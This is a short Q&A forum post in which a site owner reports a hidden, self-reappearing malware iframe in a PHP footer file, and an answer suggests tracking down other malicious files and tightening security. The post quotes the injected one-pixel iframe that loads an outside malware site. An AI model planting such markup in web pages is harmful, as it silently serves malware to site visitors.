# I can't delete malware iframe from my .php page

Tags: malware

I've found in my footer.php page that following line:

```
<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1>
</iframe>
```

I can't delete this line. If i delete it then it's show again and again. Why ? It's malware iframe that i found after searcing Google.

Any help greatly appreciate:)

Answer (score 0):

It appears that another file may be modifying this one when it detects a change. You need to find ALL of the malicious files/code and root them out in order to keep that line from appearing. Also, you may want to beef up your security, update patches, etc etc. The attacker may still have access to your website or server. If you use a web-hosting company for your site, you may want to ask them for help in removal.

Good Luck!